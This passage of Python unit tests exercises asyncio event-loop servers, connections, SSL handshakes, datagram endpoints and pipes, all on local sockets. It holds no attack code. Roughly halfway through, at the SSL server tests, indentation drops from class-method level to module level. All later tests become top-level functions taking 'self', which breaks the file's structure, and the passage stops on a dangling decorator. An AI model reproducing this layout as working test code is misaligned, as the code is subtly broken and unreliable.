        with test_utils.run_test_server(use_ssl=True) as httpd:
            create_connection = functools.partial(
                self.loop.create_connection,
                lambda: MyProto(loop=self.loop),
                *httpd.address)
            self._test_create_ssl_connection(httpd, create_connection,
                                             peername=httpd.address)
    @socket_helper.skip_unless_bind_unix_socket
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_create_ssl_unix_connection(self):
        # Issue #20682: On Mac OS X Tiger, getsockname() returns a
        # zero-length address for UNIX socket.
        check_sockname = not broken_unix_getsockname()
        with test_utils.run_test_unix_server(use_ssl=True) as httpd:
            create_connection = functools.partial(
                self.loop.create_unix_connection,
                lambda: MyProto(loop=self.loop), httpd.address,
                server_hostname='127.0.0.1')
            self._test_create_ssl_connection(httpd, create_connection,
                                             check_sockname,
                                             peername=httpd.address)
    # local_addr with a free port must be reflected in sockname.
    def test_create_connection_local_addr(self):
        with test_utils.run_test_server() as httpd:
            port = socket_helper.find_unused_port()
            f = self.loop.create_connection(
                lambda: MyProto(loop=self.loop),
                *httpd.address, local_addr=(httpd.address[0], port))
            tr, pr = self.loop.run_until_complete(f)
            expected = pr.transport.get_extra_info('sockname')[1]
            self.assertEqual(port, expected)
            tr.close()
    # Binding to the server's own address must fail with EADDRINUSE.
    def test_create_connection_local_addr_in_use(self):
        with test_utils.run_test_server() as httpd:
            f = self.loop.create_connection(
                lambda: MyProto(loop=self.loop),
                *httpd.address, local_addr=httpd.address)
            with self.assertRaises(OSError) as cm:
                self.loop.run_until_complete(f)
            self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
            self.assertIn(str(httpd.address), cm.exception.strerror)
    # Full round-trip over a pre-accepted socket; also reused (with contexts)
    # by test_ssl_connect_accepted_socket below.
    def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
        loop = self.loop
        class MyProto(MyBaseProto):
            def connection_lost(self, exc):
                super().connection_lost(exc)
                loop.call_soon(loop.stop)
            def data_received(self, data):
                super().data_received(data)
                self.transport.write(expected_response)
        lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
        addr = lsock.getsockname()
        message = b'test data'
        response = None
        expected_response = b'roger'
        def client():
            nonlocal response
            try:
                csock = socket.socket()
                if client_ssl is not None:
                    csock = client_ssl.wrap_socket(csock)
                csock.connect(addr)
                csock.sendall(message)
                response = csock.recv(99)
                csock.close()
            except Exception as exc:
                print(
                    "Failure in client thread in test_connect_accepted_socket",
                    exc)
        thread = threading.Thread(target=client, daemon=True)
        thread.start()
        conn, _ = lsock.accept()
        proto = MyProto(loop=loop)
        proto.loop = loop
        loop.run_until_complete(
            loop.connect_accepted_socket(
                (lambda: proto), conn, ssl=server_ssl))
        loop.run_forever()
        proto.transport.close()
        lsock.close()
        threading_helper.join_thread(thread)
        self.assertFalse(thread.is_alive())
        self.assertEqual(proto.state, 'CLOSED')
        self.assertEqual(proto.nbytes, len(message))
        self.assertEqual(response, expected_response)
    @unittest.skipIf(ssl is None, 'No ssl module')
    def test_ssl_connect_accepted_socket(self):
        server_context = test_utils.simple_server_sslcontext()
        client_context = test_utils.simple_client_sslcontext()
        self.test_connect_accepted_socket(server_context, client_context)
    # ssl_handshake_timeout without ssl is rejected with ValueError.
    def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
        sock = socket.socket()
        self.addCleanup(sock.close)
        coro = self.loop.connect_accepted_socket(
            MyProto, sock, ssl_handshake_timeout=support.LOOPBACK_TIMEOUT)
        with self.assertRaisesRegex(
                ValueError,
                'ssl_handshake_timeout is only meaningful with ssl'):
            self.loop.run_until_complete(coro)
    @mock.patch('asyncio.base_events.socket')
    # With getaddrinfo and the socket module mocked out, create_server should
    # bind exactly the set of unique hosts.  (`getsockbyname` is a fabricated
    # attribute on the mock socket -- no real sockets are involved.)
    def create_server_multiple_hosts(self, family, hosts, mock_sock):
        async def getaddrinfo(host, port, *args, **kw):
            if family == socket.AF_INET:
                return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
            else:
                return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
        def getaddrinfo_task(*args, **kwds):
            return self.loop.create_task(getaddrinfo(*args, **kwds))
        unique_hosts = set(hosts)
        if family == socket.AF_INET:
            mock_sock.socket().getsockbyname.side_effect = [
                (host, 80) for host in unique_hosts]
        else:
            mock_sock.socket().getsockbyname.side_effect = [
                (host, 80, 0, 0) for host in unique_hosts]
        self.loop.getaddrinfo = getaddrinfo_task
        self.loop._start_serving = mock.Mock()
        self.loop._stop_serving = mock.Mock()
        f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
        server = self.loop.run_until_complete(f)
        self.addCleanup(server.close)
        server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
        self.assertEqual(server_hosts, unique_hosts)
    # Duplicate hosts in the input list must be de-duplicated (IPv4).
    def test_create_server_multiple_hosts_ipv4(self):
        self.create_server_multiple_hosts(socket.AF_INET,
                                          ['1.2.3.4', '5.6.7.8', '1.2.3.4'])
    # Same, for IPv6 addresses.
    def test_create_server_multiple_hosts_ipv6(self):
        self.create_server_multiple_hosts(socket.AF_INET6,
                                          ['::1', '::2', '::1'])
    # End-to-end TCP server: connect, send 3 bytes, inspect extra_info, close.
    def test_create_server(self):
        proto = MyProto(self.loop)
        f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
        server = self.loop.run_until_complete(f)
        self.assertEqual(len(server.sockets), 1)
        sock = server.sockets[0]
        host, port = sock.getsockname()
        self.assertEqual(host, '0.0.0.0')
        client = socket.socket()
        client.connect(('127.0.0.1', port))
        client.sendall(b'xxx')
        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)
        test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
        self.assertEqual(3, proto.nbytes)
        # extra info is available
        self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
        self.assertEqual('127.0.0.1',
                         proto.transport.get_extra_info('peername')[0])
        # close connection
        proto.transport.close()
        self.loop.run_until_complete(proto.done)
        self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed after to avoid ECONNRESET upon
        # recv()/send() on the serving socket
        client.close()
        # close server
        server.close()
    @unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
    # SO_REUSEPORT must be off by default and on when reuse_port=True.
    def test_create_server_reuse_port(self):
        proto = MyProto(self.loop)
        f = self.loop.create_server(
            lambda: proto, '0.0.0.0', 0)
        server = self.loop.run_until_complete(f)
        self.assertEqual(len(server.sockets), 1)
        sock = server.sockets[0]
        self.assertFalse(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEPORT))
        server.close()
        test_utils.run_briefly(self.loop)
        proto = MyProto(self.loop)
        f = self.loop.create_server(
            lambda: proto, '0.0.0.0', 0, reuse_port=True)
        server = self.loop.run_until_complete(f)
        self.assertEqual(len(server.sockets), 1)
        sock = server.sockets[0]
        self.assertTrue(
            sock.getsockopt(
                socket.SOL_SOCKET, socket.SO_REUSEPORT))
        server.close()
    # Helper: create a unix-socket server on a generated path; the path is
    # unlinked during cleanup.
    def _make_unix_server(self, factory, **kwargs):
        path = test_utils.gen_unix_socket_path()
        self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
        f = self.loop.create_unix_server(factory, path, **kwargs)
        server = self.loop.run_until_complete(f)
        return server, path
    @socket_helper.skip_unless_bind_unix_socket
    # End-to-end unix-socket server round trip.
    def test_create_unix_server(self):
        proto = MyProto(loop=self.loop)
        server, path = self._make_unix_server(lambda: proto)
        self.assertEqual(len(server.sockets), 1)
        client = socket.socket(socket.AF_UNIX)
        client.connect(path)
        client.sendall(b'xxx')
        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)
        test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
        self.assertEqual(3, proto.nbytes)
        # close connection
        proto.transport.close()
        self.loop.run_until_complete(proto.done)
        self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed after to avoid ECONNRESET upon
        # recv()/send() on the serving socket
        client.close()
        # close server
        server.close()
    @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
    # Passing both path and sock must be rejected.
    def test_create_unix_server_path_socket_error(self):
        proto = MyProto(loop=self.loop)
        sock = socket.socket()
        with sock:
            f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
            with self.assertRaisesRegex(ValueError,
                                        'path and sock can not be specified '
                                        'at the same time'):
                self.loop.run_until_complete(f)
    # Build a TLS server context loaded with the given cert chain.
    # NOTE(review): OP_NO_SSLv2 is deprecated/no-op on modern OpenSSL -- kept
    # for compatibility with older builds, presumably; confirm before removing.
    def _create_ssl_context(self, certfile, keyfile=None):
        sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        sslcontext.options |= ssl.OP_NO_SSLv2
        sslcontext.load_cert_chain(certfile, keyfile)
        return sslcontext
    # Helper: start an SSL TCP server on loopback; returns (server, host, port).
    def _make_ssl_server(self, factory, certfile, keyfile=None):
        sslcontext = self._create_ssl_context(certfile, keyfile)
        f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
        server = self.loop.run_until_complete(f)
        sock = server.sockets[0]
        host, port = sock.getsockname()
        self.assertEqual(host, '127.0.0.1')
        return server, host, port
    # Helper: same as above over a unix socket; returns (server, path).
    def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
        sslcontext = self._create_ssl_context(certfile, keyfile)
        return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
    """TLS server accepts a TLS client connection and receives its data."""
    proto = MyProto(loop=self.loop)
    server, host, port = self._make_ssl_server(
        lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
    f_c = self.loop.create_connection(MyBaseProto, host, port,
                                      ssl=test_utils.dummy_ssl_context())
    client, pr = self.loop.run_until_complete(f_c)
    client.write(b'xxx')
    self.loop.run_until_complete(proto.connected)
    self.assertEqual('CONNECTED', proto.state)
    test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
    self.assertEqual(3, proto.nbytes)
    # extra info is available
    self.check_ssl_extra_info(client, peername=(host, port))
    # close connection
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
    # the client socket must be closed after to avoid ECONNRESET upon
    # recv()/send() on the serving socket
    client.close()
    # stop serving
    server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
    """Same as test_create_server_ssl but over a UNIX-domain socket."""
    proto = MyProto(loop=self.loop)
    server, path = self._make_ssl_unix_server(
        lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
    # Empty server_hostname disables hostname matching for this client.
    f_c = self.loop.create_unix_connection(
        MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
        server_hostname='')
    client, pr = self.loop.run_until_complete(f_c)
    client.write(b'xxx')
    self.loop.run_until_complete(proto.connected)
    self.assertEqual('CONNECTED', proto.state)
    test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
    self.assertEqual(3, proto.nbytes)
    # close connection
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
    # the client socket must be closed after to avoid ECONNRESET upon
    # recv()/send() on the serving socket
    client.close()
    # stop serving
    server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
    """Handshake must fail when the client requires verification but has no CA."""
    proto = MyProto(loop=self.loop)
    server, host, port = self._make_ssl_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # no CA loaded
    f_c = self.loop.create_connection(MyProto, host, port,
                                      ssl=sslcontext_client)
    with mock.patch.object(self.loop, 'call_exception_handler'):
        with test_utils.disable_logger():
            with self.assertRaisesRegex(ssl.SSLError,
                                        '(?i)certificate.verify.failed'):
                self.loop.run_until_complete(f_c)
            # execute the loop to log the connection error
            test_utils.run_briefly(self.loop)
    # close connection
    self.assertIsNone(proto.transport)
    server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
    """UNIX-socket variant: verification fails when the client has no CA loaded."""
    proto = MyProto(loop=self.loop)
    server, path = self._make_ssl_unix_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # no CA loaded
    f_c = self.loop.create_unix_connection(MyProto, path,
                                           ssl=sslcontext_client,
                                           server_hostname='invalid')
    with mock.patch.object(self.loop, 'call_exception_handler'):
        with test_utils.disable_logger():
            with self.assertRaisesRegex(ssl.SSLError,
                                        '(?i)certificate.verify.failed'):
                self.loop.run_until_complete(f_c)
            # execute the loop to log the connection error
            test_utils.run_briefly(self.loop)
    # close connection
    self.assertIsNone(proto.transport)
    server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
    """Hostname check must reject a cert that is not valid for 127.0.0.1."""
    proto = MyProto(loop=self.loop)
    server, host, port = self._make_ssl_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    sslcontext_client.load_verify_locations(
        cafile=test_utils.SIGNING_CA)
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # incorrect server_hostname
    f_c = self.loop.create_connection(MyProto, host, port,
                                      ssl=sslcontext_client)
    with mock.patch.object(self.loop, 'call_exception_handler'):
        with test_utils.disable_logger():
            with self.assertRaisesRegex(
                    ssl.CertificateError,
                    "IP address mismatch, certificate is not valid for "
                    "'127.0.0.1'"):
                self.loop.run_until_complete(f_c)
    # close connection
    # transport is None because TLS ALERT aborted the handshake
    self.assertIsNone(proto.transport)
    server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
    """Verified TLS over a UNIX socket succeeds with the right CA + hostname."""
    proto = MyProto(loop=self.loop)
    server, path = self._make_ssl_unix_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # Connection succeeds with correct CA and server hostname.
    f_c = self.loop.create_unix_connection(MyProto, path,
                                           ssl=sslcontext_client,
                                           server_hostname='localhost')
    client, pr = self.loop.run_until_complete(f_c)
    self.loop.run_until_complete(proto.connected)
    # close connection
    proto.transport.close()
    client.close()
    server.close()
    self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
    """Verified TLS over TCP succeeds and exposes the peer certificate."""
    proto = MyProto(loop=self.loop)
    server, host, port = self._make_ssl_server(
        lambda: proto, test_utils.SIGNED_CERTFILE)
    sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    sslcontext_client.options |= ssl.OP_NO_SSLv2
    sslcontext_client.verify_mode = ssl.CERT_REQUIRED
    sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
    if hasattr(sslcontext_client, 'check_hostname'):
        sslcontext_client.check_hostname = True
    # Connection succeeds with correct CA and server hostname.
    f_c = self.loop.create_connection(MyProto, host, port,
                                      ssl=sslcontext_client,
                                      server_hostname='localhost')
    client, pr = self.loop.run_until_complete(f_c)
    self.loop.run_until_complete(proto.connected)
    # extra info is available
    self.check_ssl_extra_info(client, peername=(host, port),
                              peercert=test_utils.PEERCERT)
    # close connection
    proto.transport.close()
    client.close()
    server.close()
    self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
    """create_server(sock=...) must serve on the exact socket passed in."""
    proto = self.loop.create_future()

    class TestMyProto(MyProto):
        def connection_made(self, transport):
            super().connection_made(transport)
            proto.set_result(self)

    sock_ob = socket.create_server(('0.0.0.0', 0))
    f = self.loop.create_server(TestMyProto, sock=sock_ob)
    server = self.loop.run_until_complete(f)
    sock = server.sockets[0]
    # The server must reuse the supplied socket, not duplicate it.
    self.assertEqual(sock.fileno(), sock_ob.fileno())
    host, port = sock.getsockname()
    self.assertEqual(host, '0.0.0.0')
    client = socket.socket()
    client.connect(('127.0.0.1', port))
    client.send(b'xxx')
    client.close()
    server.close()
def test_create_server_addr_in_use(self):
    """A second server bound to an in-use address fails with EADDRINUSE."""
    sock_ob = socket.create_server(('0.0.0.0', 0))
    f = self.loop.create_server(MyProto, sock=sock_ob)
    server = self.loop.run_until_complete(f)
    sock = server.sockets[0]
    host, port = sock.getsockname()
    f = self.loop.create_server(MyProto, host=host, port=port)
    with self.assertRaises(OSError) as cm:
        self.loop.run_until_complete(f)
    self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
    server.close()
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
    """host=None creates a server reachable over both IPv4 and IPv6."""
    f_proto = self.loop.create_future()

    class TestMyProto(MyProto):
        def connection_made(self, transport):
            super().connection_made(transport)
            f_proto.set_result(self)

    try_count = 0
    while True:
        try:
            port = socket_helper.find_unused_port()
            f = self.loop.create_server(TestMyProto, host=None, port=port)
            server = self.loop.run_until_complete(f)
        except OSError as ex:
            if ex.errno == errno.EADDRINUSE:
                # The "unused" port can be taken by someone else between
                # probing and binding; retry with a fresh port, 5 times max.
                try_count += 1
                self.assertGreaterEqual(5, try_count)
                continue
            else:
                raise
        else:
            break
    # First connect over IPv4...
    client = socket.socket()
    client.connect(('127.0.0.1', port))
    client.send(b'xxx')
    proto = self.loop.run_until_complete(f_proto)
    proto.transport.close()
    client.close()
    # ...then over IPv6 against the same port.
    f_proto = self.loop.create_future()
    client = socket.socket(socket.AF_INET6)
    client.connect(('::1', port))
    client.send(b'xxx')
    proto = self.loop.run_until_complete(f_proto)
    proto.transport.close()
    client.close()
    server.close()
def test_server_close(self):
    """After server.close(), new connection attempts are refused."""
    f = self.loop.create_server(MyProto, '0.0.0.0', 0)
    server = self.loop.run_until_complete(f)
    sock = server.sockets[0]
    host, port = sock.getsockname()
    client = socket.socket()
    client.connect(('127.0.0.1', port))
    client.send(b'xxx')
    client.close()
    server.close()
    client = socket.socket()
    self.assertRaises(
        ConnectionRefusedError, client.connect, ('127.0.0.1', port))
    client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
    """Round-trip a datagram between a local UDP echo server and a client.

    The server echoes every datagram back prefixed with ``b'resp:'``, so
    the client receives 8 bytes for the 3-byte payload sent below.
    """
    class TestMyDatagramProto(MyDatagramProto):
        def __init__(inner_self):
            super().__init__(loop=self.loop)

        def datagram_received(self, data, addr):
            super().datagram_received(data, addr)
            self.transport.sendto(b'resp:'+data, addr)

    coro = self.loop.create_datagram_endpoint(
        TestMyDatagramProto, local_addr=local_addr, family=family)
    s_transport, server = self.loop.run_until_complete(coro)
    sockname = s_transport.get_extra_info('sockname')
    # Normalize the bound address to numeric host/port strings.
    host, port = socket.getnameinfo(
        sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
    self.assertIsInstance(s_transport, asyncio.Transport)
    self.assertIsInstance(server, TestMyDatagramProto)
    self.assertEqual('INITIALIZED', server.state)
    self.assertIs(server.transport, s_transport)

    coro = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(loop=self.loop),
        remote_addr=(host, port))
    transport, client = self.loop.run_until_complete(coro)
    self.assertIsInstance(transport, asyncio.Transport)
    self.assertIsInstance(client, MyDatagramProto)
    self.assertEqual('INITIALIZED', client.state)
    self.assertIs(client.transport, transport)

    transport.sendto(b'xxx')
    test_utils.run_until(self.loop, lambda: server.nbytes)
    self.assertEqual(3, server.nbytes)
    test_utils.run_until(self.loop, lambda: client.nbytes)
    # received: b'resp:' (5 bytes) + b'xxx' (3 bytes)
    self.assertEqual(8, client.nbytes)
    # extra info is available
    self.assertIsNotNone(transport.get_extra_info('sockname'))
    # close connection
    transport.close()
    self.loop.run_until_complete(client.done)
    self.assertEqual('CLOSED', client.state)
    server.transport.close()
def test_create_datagram_endpoint(self):
    """IPv4 variant of the datagram endpoint round-trip test."""
    self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
    """IPv6 variant of the datagram endpoint round-trip test."""
    self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
    """Create a datagram endpoint from a pre-bound socket.

    A UDP socket is bound manually on 127.0.0.1 and handed to
    create_datagram_endpoint() via the ``sock`` argument; the resulting
    transport/protocol pair must wrap that socket.
    """
    sock = None
    local_address = ('127.0.0.1', 0)
    infos = self.loop.run_until_complete(
        self.loop.getaddrinfo(
            *local_address, type=socket.SOCK_DGRAM))
    # Try each resolved address until one binds successfully.
    for family, type, proto, cname, address in infos:
        try:
            sock = socket.socket(family=family, type=type, proto=proto)
            sock.setblocking(False)
            sock.bind(address)
        except OSError:
            # Bug fix: was a bare ``except:``, which also swallowed
            # SystemExit/KeyboardInterrupt; socket() and bind() only
            # raise OSError (and its subclasses).
            pass
        else:
            break
    else:
        self.fail('Can not create socket.')

    f = self.loop.create_datagram_endpoint(
        lambda: MyDatagramProto(loop=self.loop), sock=sock)
    tr, pr = self.loop.run_until_complete(f)
    self.assertIsInstance(tr, asyncio.Transport)
    self.assertIsInstance(pr, MyDatagramProto)
    tr.close()
    self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
    """Selector loops own one internal fd pair, released on close()."""
    loop = self.create_event_loop()
    if not isinstance(loop, selector_events.BaseSelectorEventLoop):
        loop.close()
        self.skipTest('loop is not a BaseSelectorEventLoop')
    self.assertEqual(1, loop._internal_fds)
    loop.close()
    self.assertEqual(0, loop._internal_fds)
    # The internal self-socket pair must be dropped after close().
    self.assertIsNone(loop._csock)
    self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_read_pipe(self):
    """connect_read_pipe() delivers bytes written to the pipe's write end."""
    proto = MyReadPipeProto(loop=self.loop)
    rpipe, wpipe = os.pipe()
    pipeobj = io.open(rpipe, 'rb', 1024)

    async def connect():
        t, p = await self.loop.connect_read_pipe(
            lambda: proto, pipeobj)
        self.assertIs(p, proto)
        self.assertIs(t, proto.transport)
        self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
        self.assertEqual(0, proto.nbytes)

    self.loop.run_until_complete(connect())
    os.write(wpipe, b'1')
    test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
    self.assertEqual(1, proto.nbytes)
    os.write(wpipe, b'2345')
    test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
    self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
    self.assertEqual(5, proto.nbytes)
    # Closing the write end produces EOF, then the transport closes.
    os.close(wpipe)
    self.loop.run_until_complete(proto.done)
    self.assertEqual(
        ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
    # extra info is available
    self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
    """repr() of pipe transports must not fail after the loop is closed.

    This test reproduces the issue #314 on GitHub.
    """
    loop = self.create_event_loop()
    read_proto = MyReadPipeProto(loop=loop)
    write_proto = MyWritePipeProto(loop=loop)
    rpipe, wpipe = os.pipe()
    rpipeobj = io.open(rpipe, 'rb', 1024)
    wpipeobj = io.open(wpipe, 'w', 1024, encoding="utf-8")

    async def connect():
        read_transport, _ = await loop.connect_read_pipe(
            lambda: read_proto, rpipeobj)
        write_transport, _ = await loop.connect_write_pipe(
            lambda: write_proto, wpipeobj)
        return read_transport, write_transport

    # Run and close the loop without closing the transports
    read_transport, write_transport = loop.run_until_complete(connect())
    loop.close()

    # These 'repr' calls used to raise an AttributeError
    # See Issue #314 on GitHub
    self.assertIn('open', repr(read_transport))
    self.assertIn('open', repr(write_transport))

    # Clean up (avoid ResourceWarning)
    rpipeobj.close()
    wpipeobj.close()
    # Detach so the transports do not try to close the pipes again.
    read_transport._pipe = None
    write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
@unittest.skipUnless(hasattr(os, 'openpty'), 'need os.openpty()')
def test_read_pty_output(self):
    """connect_read_pipe() works with a PTY master as the readable end."""
    proto = MyReadPipeProto(loop=self.loop)

    master, slave = os.openpty()
    master_read_obj = io.open(master, 'rb', 0)

    async def connect():
        t, p = await self.loop.connect_read_pipe(lambda: proto,
                                                 master_read_obj)
        self.assertIs(p, proto)
        self.assertIs(t, proto.transport)
        self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
        self.assertEqual(0, proto.nbytes)

    self.loop.run_until_complete(connect())

    os.write(slave, b'1')
    test_utils.run_until(self.loop, lambda: proto.nbytes)
    self.assertEqual(1, proto.nbytes)

    os.write(slave, b'2345')
    test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
    self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
    self.assertEqual(5, proto.nbytes)

    os.close(slave)
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual(
        ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
    # extra info is available
    self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_write_pipe(self):
    """connect_write_pipe() writes appear on the pipe's read end."""
    rpipe, wpipe = os.pipe()
    pipeobj = io.open(wpipe, 'wb', 1024)

    proto = MyWritePipeProto(loop=self.loop)
    connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
    transport, p = self.loop.run_until_complete(connect)
    self.assertIs(p, proto)
    self.assertIs(transport, proto.transport)
    self.assertEqual('CONNECTED', proto.state)

    transport.write(b'1')

    data = bytearray()

    def reader(data):
        # Drain the read end into *data*; returns total bytes collected.
        chunk = os.read(rpipe, 1024)
        data += chunk
        return len(data)

    test_utils.run_until(self.loop, lambda: reader(data) >= 1)
    self.assertEqual(b'1', data)

    transport.write(b'2345')
    test_utils.run_until(self.loop, lambda: reader(data) >= 5)
    self.assertEqual(b'12345', data)
    self.assertEqual('CONNECTED', proto.state)

    os.close(rpipe)

    # extra info is available
    self.assertIsNotNone(proto.transport.get_extra_info('pipe'))

    # close connection
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
    """Closing the peer of a write-pipe transport must disconnect it."""
    rsock, wsock = socket.socketpair()
    rsock.setblocking(False)
    pipeobj = io.open(wsock.detach(), 'wb', 1024)

    proto = MyWritePipeProto(loop=self.loop)
    connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
    transport, p = self.loop.run_until_complete(connect)
    self.assertIs(p, proto)
    self.assertIs(transport, proto.transport)
    self.assertEqual('CONNECTED', proto.state)

    transport.write(b'1')
    data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
    self.assertEqual(b'1', data)

    # Closing the reading side must drive the protocol to CLOSED.
    rsock.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
@unittest.skipUnless(hasattr(os, 'openpty'), 'need os.openpty()')
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
    """connect_write_pipe() works with a PTY slave as the writable end."""
    master, slave = os.openpty()
    slave_write_obj = io.open(slave, 'wb', 0)

    proto = MyWritePipeProto(loop=self.loop)
    connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
    transport, p = self.loop.run_until_complete(connect)
    self.assertIs(p, proto)
    self.assertIs(transport, proto.transport)
    self.assertEqual('CONNECTED', proto.state)

    transport.write(b'1')

    data = bytearray()

    def reader(data):
        # Drain the PTY master into *data*; returns total bytes collected.
        chunk = os.read(master, 1024)
        data += chunk
        return len(data)

    test_utils.run_until(self.loop, lambda: reader(data) >= 1,
                         timeout=support.SHORT_TIMEOUT)
    self.assertEqual(b'1', data)

    transport.write(b'2345')
    test_utils.run_until(self.loop, lambda: reader(data) >= 5,
                         timeout=support.SHORT_TIMEOUT)
    self.assertEqual(b'12345', data)
    self.assertEqual('CONNECTED', proto.state)

    os.close(master)

    # extra info is available
    self.assertIsNotNone(proto.transport.get_extra_info('pipe'))

    # close connection
    proto.transport.close()
    self.loop.run_until_complete(proto.done)
    self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
                     "Don't support pipes for Windows")
